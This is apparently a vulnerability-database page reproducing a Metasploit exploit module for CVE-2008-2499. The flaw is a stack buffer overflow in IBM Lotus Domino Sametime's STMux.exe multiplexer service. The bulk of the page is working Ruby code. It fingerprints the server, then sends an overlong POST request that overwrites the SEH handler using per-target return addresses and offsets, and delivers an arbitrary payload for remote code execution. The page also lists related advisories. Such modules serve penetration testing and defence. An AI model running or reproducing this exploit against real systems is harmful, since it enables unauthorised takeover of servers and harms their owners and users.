Lucene search
+L

IBM Lotus Domino Sametime STMux.exe Stack Overflow

🗓️ 26 Nov 2009 00:00:00Reported by patrickType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 45 Views

IBM Lotus Domino Sametime STMux Stack Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
CVE-2008-2499
21 May 200800:00
circl
checkpoint_advisories
IBM Lotus Sametime Server Multiplexer Stack Buffer Overflow (CVE-2008-2499)
16 Nov 200900:00
checkpoint_advisories
cve
CVE-2008-2499
29 May 200816:00
cve
cvelist
CVE-2008-2499
29 May 200816:00
cvelist
d2
DSquare Exploit Pack: D2SEC_SAMETIME
29 May 200816:32
d2
exploitdb
IBM Lotus Domino Sametime - 'STMux.exe' Remote Stack Buffer Overflow (Metasploit)
9 May 201000:00
exploitdb
kaspersky
KLA10203 ACE vulnerability in IBM Lotus Sametime
29 May 200800:00
kaspersky
nessus
IBM Lotus Sametime Multiplexer Buffer Overflow
24 Sep 201300:00
nessus
metasploit
IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
14 Nov 200811:04
metasploit
nvd
CVE-2008-2499
29 May 200816:32
nvd
Rows per page
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Overflow',  
'Description' => %q{  
This module exploits a stack overflow in Lotus Domino's Sametime  
Server. By sending an overly long POST request to the Multiplexer  
STMux.exe service we are able to overwrite SEH. Based on the exploit  
by Manuel Santamarina Suarez.  
},  
'Author' => [ 'patrick', 'riaf <[email protected]>' ],  
'Arch' => [ ARCH_X86 ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'CVE', '2008-2499' ],  
[ 'OSVDB', '45610' ],  
[ 'BID', '29328' ],  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ],  
],  
'Privileged' => true,  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00\x0a\x0d",  
'StackAdjustment' => -3500,  
},  
'Platform' => ['win'],  
'Targets' =>  
[  
# Patrick - Tested OK against Windows 2003 SP1 20081114  
[ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll  
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll  
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],  
[ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],  
[ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],  
],  
'DisclosureDate' => 'May 21 2008',   
'DefaultTarget' => 1))  
  
register_options(  
[  
Opt::RPORT(1533),  
], self.class)  
end  
  
def check  
connect  
  
req = "HEAD / HTTP/1.0\r\n\r\n"  
req << "User-Agent: Sametime Community Agent\r\n"  
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"  
sock.put(req)  
res = sock.get_once(-1,3)  
  
disconnect  
  
if (res =~/Lotus-Domino/)  
connect  
  
req = "GET /CommunityCBR HTTP/1.0\r\n\r\n"  
req << "User-Agent: Sametime Community Agent\r\n"  
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"  
sock.put(req)  
res = sock.get_once(-1,3)  
  
disconnect  
  
if (res =~/200 OK/)  
return Exploit::CheckCode::Detected  
end  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
pad1 = rand_text_alpha_lower(44)  
pad2 = rand_text_alpha_lower(29)  
  
# Patrick - We should use Metasm here.  
popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]  
popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]  
esp = "\xff\x24\x24" # dword ptr ss:[esp]  
jmp = "\x74\x23" + "\x75\x21" # je short, jnz short  
seh = [target['Ret']].pack('V')  
  
path = pad1 + jmp + seh + pad2 + popebx + popad + esp  
  
req = "POST /CommunityCBR/CC.39.#{path}/\r\n"  
req << "User-Agent: Sametime Community Agent\r\n"  
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"  
req << "Content-Length: #{payload.encoded.length}\r\n"  
req << "Connection: Close\r\n"  
req << "Cache-Control: no-cache\r\n\r\n"  
req << payload.encoded  
  
sock.put(req)  
  
handler  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation